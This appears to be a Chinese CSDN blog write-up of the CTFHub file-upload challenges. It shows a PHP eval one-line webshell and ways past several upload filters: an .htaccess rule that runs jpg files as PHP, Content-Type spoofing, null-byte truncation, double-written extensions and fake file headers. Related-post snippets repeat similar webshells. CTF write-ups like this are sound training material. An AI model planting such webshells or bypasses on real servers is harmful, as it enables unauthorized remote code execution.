CTFHub-web(文件上传)

最新推荐文章于 2024-06-03 17:24:52 发布
最新推荐文章于 2024-06-03 17:24:52 发布
阅读量3k 收藏
点赞数
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49502930/article/details/121726583
版权

文章目录

无验证

我们打开关卡,上传一句话木马程序
在这里插入图片描述

<?php @eval($_POST['shell']);?>

提交成功,显示相对路径
在这里插入图片描述

打开蚁剑连接测试
在这里插入图片描述打开flag文件即可成功获得flag。

前端验证

上传时显示不可上传
在这里插入图片描述提示为前端验证,我们打开页面源代码查看
在这里插入图片描述将一句话木马后缀改为jpg格式上传,然后用burp抓包修改
在这里插入图片描述将文件后缀改为php,然后上传类型也改为php
在这里插入图片描述

用蚁剑连接测试
在这里插入图片描述
打开文件,得到flag
在这里插入图片描述

.htaccess

htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能

先上传.htaccess文件

<FilesMatch "jpg">
    SetHandler application/x-httpd-php
</FilesMatch>

在这里插入图片描述

可以把jpg文件解析成php文件
然后再上传1.jpg一句话木马文件
在这里插入图片描述然后我们用蚁剑测试链接,注意url是upload/1.jpg
在这里插入图片描述找到flag
在这里插入图片描述

MIME绕过

上传一句话木马1.php文件发现不成功
在这里插入图片描述我们用burp抓包查看
在这里插入图片描述我们将此处的type改为image/jpg
上传即可成功
在这里插入图片描述蚁剑测试连接找到flag
在这里插入图片描述
在这里插入图片描述

00截断

我们先打开关卡
在这里插入图片描述
用burp抓包,然后修改两部分放包,大家可以在网上收集资料查看00截断原理
在这里插入图片描述
然后放包
在这里插入图片描述上传成功,我们再用蚁剑连接测试,因为我们修改了路径
所以这里是upload/1.php在这里插入图片描述
得到flag
在这里插入图片描述

双写后缀

我们上传1.php发现不成功,查看页面源码发现
在这里插入图片描述

这里将我们的后缀替换成了空格
我们双写绕过
修改为1.pphphp即可上传成功
然后用蚁剑连接,获得flag
在这里插入图片描述

文件头检查

我们将1.php文件加个头缀
在这里插入图片描述
然后用burp抓包,修改上传类型 image/jpg
在这里插入图片描述
然后放包即可
在这里插入图片描述
蚁剑测试链接,获得flag
在这里插入图片描述

一杯冰美式~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Ctfhub解题 web 文件
weixin_46703850的博客
03-20 466
Ctfhub解题 web XSS反射型1.无验证2.前端验证3. .htaccess方法一:方法二:方法三: 介绍:记录解题过程 1.无验证 编写PHP一句话木马 <?php echo "上成功"; eval($_POST['cmd']); ?> 无验证直接上 回显 上文件相对路径 upload/shell.php 使用蚁剑 得到flag <?php // ctfhub{c1a224871866a2b954019c3a} 2.前端验证 上代码:
CtfHub-wp(web)
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
CTFHUB-web-文件
ookami6497的博客
12-02 641
【CTF-Web】文件漏洞学习笔记(ctfshow题目)
最新发布
jayq1的博客
06-03 1557
文件漏洞学习笔记,ctfshow题目为依托
CTFHubWeb—文件
qq_45927819的博客
07-27 1427
文章目录无验证前端验证.htaccess方法一方法二MIME绕过文件头检查00截断 无验证 没什么限制,直接一句话木马 <?php @eval($_POST['upload']);?> 提交成功! 并且提示了文件的相对路径,那我们可以直接使用蚁剑或者菜刀连接 打开便可以得到flag! 前端验证 既然是前端js验证,那我们尝试用burpsuite抓包 上题写的一句话木马还可以接着用,但是我们要将他的后缀改成png或者jpg,抓包: forward放包,上成功!提示了文件路径,蚁剑连接
CtfHub-web-文件
BROTHERYY的博客
05-10 632
1.无验证 直接,蚁剑连得flag 得到flag。 2.前端验证 这里直接把一句话的后缀改为jpg,然后再抓包修改后缀。 成功得到flag。 3.htaccess 首先编辑.htaccess文件 这里是意思以php解析含有1的文件名,然后现在上图片 得到flag。 4.MIME验证 将修改后的包丢rapeater,send 连接后得到flag。 5.文件头检查 首先制作图片马,图片可以自己用画图工具随便画一个。 然后上抓包,改后缀,repeater 得到flag。 6.00截断
CTFHUB——web——文件
weixin_45664911的博客
09-22 610
无验证 根据题目“无验证”可知,对上文件没有进行任何验证 上一句话木马,再用蚁剑进行连接 <?php @eval($_POST['a'] ?> 其中post的值可以随意更改 在地址后面添加上文件相对路径,密码是post的值 连接 ...
河南省网络安全高校战队联盟CTF训练营-web文件第一期
04-22
"河南省网络安全高校战队联盟CTF训练营-web文件第一期" 这个标题揭示了本次训练的主题,主要聚焦于网络安全领域中的一项重要技能——Web文件漏洞的利用与防御。CTF(Capture The Flag)是网络安全竞赛的一种...
3.18号日报,ctfhub中web,文件漏洞题目解法
03-18
文件漏洞
ctf-all-in-one
01-30
ctf-all-in-one
CTFHub技能树 Web-文件详解
千寻的博客
11-21 3032
文件漏洞是指由于程序员在对用户文件部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上可执行的动态脚本文件。这里上文件可以是木马,病毒,恶意脚本或者WebShell等。“文件”本身没有问题,有问题的是文件后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 ———————————————— 版权声明:本文为CSDN博主「Fasthand_」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:ht
CTFHub-Web-文件练习
Atkx's Blog
11-22 1993
无验证 上一句话木马1.php <?php @eval($_POST["pass"]);?> 上文件相对路径upload/1.php 使用蚁剑连接,连接密码为pass 查看目录,flag就在这里 前端验证 上一句话木马,结果提示该文件不允许上 题目是前端验证,直接查看网页源代码,发现只能上.jpg,.png,.gif三种格式的文件 把1.php改为1.jpg,然后上抓包 1.jpg再改为1.php,然后放包 上成功,得到相对路径upload/1.php 还
【CTF整理】CTFhub技能树-Web-文件-.htaccess
SunnyCat
05-15 3126
【CTF整理】CTFhub技能树-Web-文件-.htaccess CTFhub技能树里面的题最近做了一些,但是除了之前的SQL注入之外,其他的我实在没什么兴趣整理,毕竟网上的整理出来的博主很多,之所以专门整理这个文件.htaccess的题目,是因为我踩坑了,本以为一道简单的题目我就这么硬生生的踩进去了,还差点没出来,浪费了不少金币啊。看别的博主都是上.htaccess文件,上修改后缀的一句话木马,菜刀或是蚁剑一连就getshell了,简单的不能再简单,为毛我试了N次都是不行?试了各种形式的.h
i春秋-CTF-web文件
在Web和Reverse坑里游泳中。。。。
04-27 1726
前言 本来吧,悄悄摸鱼,想整点啥打发时间,看视频太明显,于是做做题,眉头紧锁,仔细思考,装作工作很难的样子。 这回选择web类型的题目,主要是好久没做了,手有点生,找个简单的文件练练。 打开题目环境发现: 好像是没有什么特别的。 但是往下翻看却是别有洞天。 众所周知,php是后端语言,正常情况下前端是看不到的,也就是说,出题人还是很贴心的(虽然我觉得出题人没那么好心)。 <?php header("Content-Type:text/html; charset=utf.
CTFHUB-WEB-文件
weixin_43486981的博客
08-13 571
CTFHUB-WEB-文件无验证中国蚁剑前端验证.htaccess知识点:htaccess文件.htaccess 文件漏洞原理:MIME绕过MIME((Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型文件头检查00截断00截断上原理双写后缀 无验证 靶机环境: 写个一句话木马文件: <?php @eval($_POST["pass"]);?> 在靶机环境中提交一句话木马文件 提交之后根据提示,访问路径。页面没有报错,说明上
CTFHUB--web文件(前端验证)
yuanqiqi_的博客
07-08 240
1. 查看页面代码可知,文件后缀只能是.jpg、.png或.gif 2. 将文件文件内容还是一句话木马,不知道可以从无验证那篇文章找)后缀改为.jpg格式(三选一即可)进行上,同时打开bupsuite进行抓包 Burpsuite抓到的包如下: 3. 将文件名的后缀改为php,后点击forward将包发到服务器,页面显示上成功 4. 将文件的路径输入到蚁剑中进行连接,找到对应的页面获得flag ...
CTF之萌新web学习(文件)
bmth666的博客
03-02 3675
文件方法: 1.客户端校验——javascript校验 2.服务端校验——content-type校验 3.黑名单 4..htaccess 5.00截断
CTFShow-WEB入门篇文件详细Wp(151-170)
Aluxian_的博客
07-16 2079
【代码】CTFShow-WEB入门篇文件详细Wp(115-170)
ctfhub-git泄露stash
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py http://challenge-e87e0210287ba7b3.sandbox.ctfhub.com:10800/.git/"来使用GitHack工具进行扫描和利用。同时,你也可以使用dirsearch工具来扫描目录,执行命令"python dirsearch.py -u http://challenge-5a5d24023f7ea71c.sandbox.ctfhub.com:10800 -e git -t 5"来查找ctfhub-git泄露的stash。 然而,需要注意的是,这些工具只是为了帮助你快速发现ctfhub-git的泄露,真正的挖掘过程并不会像这样直接告诉你哪里有泄露,需要自己去尝试和探索。此外,Git这一工具的使用也相当复杂,需要深入学习和实践才能熟练掌握。所以,在学习的道路上还有很长的路要走,希望你能坚持学习,共同进步!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值